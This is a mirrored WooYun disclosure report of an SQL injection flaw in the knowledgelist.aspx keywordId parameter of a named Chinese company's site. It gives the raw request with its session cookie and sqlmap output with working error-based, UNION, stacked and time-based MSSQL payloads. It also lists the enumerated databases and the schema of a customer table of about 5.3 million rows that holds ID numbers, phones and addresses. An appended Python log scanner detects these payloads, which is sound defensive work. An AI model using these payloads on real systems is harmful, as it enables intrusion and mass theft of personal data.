WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-05-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-07-09: The vendor has actively ignored the vulnerability; details disclosed to the public.
User data leak: ID document numbers and mobile phone numbers are exposed.
GET /knowledgelist.aspx?keywordId=1&newstypeId=&productId=642 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.1mutian.com:80/
Cookie: ASP.NET_SessionId=njtdkt1ldnmtapglbxntnrar; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e686%3c%2fint%3e%0d%0a++%3cint%3e1878%3c%2fint%3e%0d%0a++%3cint%3e1859%3c%2fint%3e%0d%0a++%3cint%3e1427%3c%2fint%3e%0d%0a++%3cint%3e1411%3c%2fint%3e%0d%0a++%3cint%3e438%3c%2fint%3e%0d%0a++%3cint%3e396%3c%2fint%3e%0d%0a++%3cint%3e790%3c%2fint%3e%0d%0a++%3cint%3e1861%3c%2fint%3e%0d%0a++%3cint%3e1660%3c%2fint%3e%0d%0a++%3cint%3e1674%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; CheckCode=DHJ8J; 1=1
Host: www.1mutian.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sqlmap output (the injection-point banner, which sqlmap reprints before every result when resuming from its session file, is shown once; the per-query results follow in the order they were run):

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keywordId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

current user: 'ymt'
current database: 'YMTTransDb'

available databases [10]:
[*] CustomerUser
[*] master
[*] MobileSymbol
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] YMTShopDate
[*] YMTTransDb

Database: CustomerUser
[3 tables]
+---------------------+
| CustomerInformation |
| T_DeletePhone       |
| 私人营业库          |
+---------------------+

Database: CustomerUser
Table: CustomerInformation
[15 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| id           | int      |
| mobile       | varchar  |
| 使用人       | nvarchar |
| 出生日期     | nvarchar |
| 初次登记日期 | datetime |
| 卡型         | nvarchar |
| 名字         | nvarchar |
| 地址         | nvarchar |
| 套餐更改日期 | datetime |
| 性别         | nvarchar |
| 手机         | float    |
| 有效日期     | datetime |
| 证件号码     | nvarchar |
| 话费         | nvarchar |
| 邮编         | nvarchar |
+--------------+----------+

(Column names in English: 使用人 = user/holder, 出生日期 = date of birth, 初次登记日期 = first registration date, 卡型 = card type, 名字 = name, 地址 = address, 套餐更改日期 = plan change date, 性别 = sex, 手机 = mobile phone, 有效日期 = expiry date, 证件号码 = ID document number, 话费 = phone balance, 邮编 = postal code. The table 私人营业库 is "private business database".)

Database: CustomerUser
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.CustomerInformation | 5294405 |
+-------------------------+---------+

Database: CustomerUser
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.私人营业库 | 6847309 |
+----------------+---------+

Database: CustomerUser
Table: 私人营业库
[4 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Address  | nvarchar |
| MailNo   | nvarchar |
| TelPhone | nvarchar |
| Username | nvarchar |
+----------+----------+
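The four payload shapes sqlmap reported above (error-based CONVERT(INT, ...), UNION ALL SELECT, stacked "; WAITFOR DELAY" and bare "WAITFOR DELAY") are also what a defender would hunt for in the IIS access log of an ASP.NET/MSSQL site like this one. The script below is an added example and is not part of the WooYun report or the vendor's code; the IIS W3C log lines in it are constructed to mirror the reported payloads (with %2B for "+" and %20 for spaces, as a client would send them), and the status codes are invented. It parses the log, classifies each parameter value by technique, and decodes the CHAR() chains, which reveals the prefix/suffix markers (qgpzq ... qnegq) that sqlmap wraps around extracted data so it can find them in the response.

```python
from __future__ import annotations

import re
import urllib.parse

# Constructed IIS W3C-format log excerpt (not from the original report).
# Query strings follow the payload shapes sqlmap reported against keywordId.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status
2015-05-25 10:01:02 GET /knowledgelist.aspx keywordId=1&newstypeId=&productId=642 200
2015-05-25 10:01:05 GET /knowledgelist.aspx keywordId=1'%20AND%207323=CONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(103)%2BCHAR(112)%2BCHAR(122)%2BCHAR(113)%2B(SELECT%20(CASE%20WHEN%20(7323=7323)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2BCHAR(113)%2BCHAR(110)%2BCHAR(101)%2BCHAR(103)%2BCHAR(113)))%20AND%20'FTtm'='FTtm&newstypeId=&productId=642 500
2015-05-25 10:01:09 GET /knowledgelist.aspx keywordId=1';%20WAITFOR%20DELAY%20'0:0:5'--&newstypeId=&productId=642 200
2015-05-25 10:01:15 GET /knowledgelist.aspx keywordId=-7874'%20UNION%20ALL%20SELECT%20CHAR(113)%2BCHAR(103)%2BCHAR(112)%2BCHAR(122)%2BCHAR(113)%2BCHAR(98)%2BCHAR(121)%2BCHAR(89)%2BCHAR(73)%2BCHAR(108)%2BCHAR(85)%2BCHAR(110)%2BCHAR(108)%2BCHAR(87)%2BCHAR(97)%2BCHAR(113)%2BCHAR(110)%2BCHAR(101)%2BCHAR(103)%2BCHAR(113)--%20&newstypeId=&productId=642 200
2015-05-25 10:02:00 GET /knowledgelist.aspx keywordId=2&newstypeId=&productId=642 200
"""

# One regex per MSSQL technique sqlmap reported; order fixes the output order.
SIGNATURES = {
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "union": re.compile(r"UNION\s+(?:ALL\s+)?SELECT", re.I),
    "stacked": re.compile(r";\s*(?:WAITFOR|EXEC|DECLARE|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "time-based": re.compile(r"WAITFOR\s+DELAY", re.I),
}

# Two or more CHAR(n) joined with "+", i.e. a string built without quotes.
CHAR_CHAIN = re.compile(r"(?:CHAR\(\d+\)\s*\+\s*)+CHAR\(\d+\)", re.I)


def parse_query(query: str) -> dict[str, str]:
    """Split a raw cs-uri-query on '&' only and decode each side once.

    Done by hand rather than with parse_qs so that a ';' inside a stacked
    payload is never treated as a pair separator.
    """
    params: dict[str, str] = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params[urllib.parse.unquote_plus(name)] = urllib.parse.unquote_plus(value)
    return params


def decode_char_chains(sql: str) -> list[str]:
    """Turn every CHAR(113)+CHAR(103)+... chain into the text it builds."""
    decoded = []
    for chain in CHAR_CHAIN.finditer(sql):
        codes = re.findall(r"CHAR\((\d+)\)", chain.group(0), flags=re.I)
        decoded.append("".join(chr(int(c)) for c in codes))
    return decoded


def classify_request(uri_query: str) -> dict[str, dict]:
    """Return {param: {techniques: [...], markers: [...]}} for tainted params."""
    hits: dict[str, dict] = {}
    for name, value in parse_query(uri_query).items():
        techniques = [k for k, rx in SIGNATURES.items() if rx.search(value)]
        if techniques:
            hits[name] = {"techniques": techniques, "markers": decode_char_chains(value)}
    return hits


def scan_iis_log(text: str) -> list[dict]:
    """Walk a W3C log, using its #Fields header to name the columns."""
    findings: list[dict] = []
    fields: list[str] | None = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        hits = classify_request(rec.get("cs-uri-query", ""))
        if hits:
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "uri": rec.get("cs-uri-stem", ""),
                "status": rec.get("sc-status", ""),
                "params": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["time"], f["status"], f["uri"])
        for param, info in f["params"].items():
            print(f"  {param}: {', '.join(info['techniques'])}  markers={info['markers']}")
```

The decoded markers are worth keeping: once you know sqlmap bracketed its output with "qgpzq" and "qnegq", grepping the corresponding HTTP responses (or the ASP.NET error pages, which is where the error-based technique leaks data) for those strings tells you which rows actually left the server, not just that the attempt was made.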
I won't dump the data.
You know what I mean.
Could not reach the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)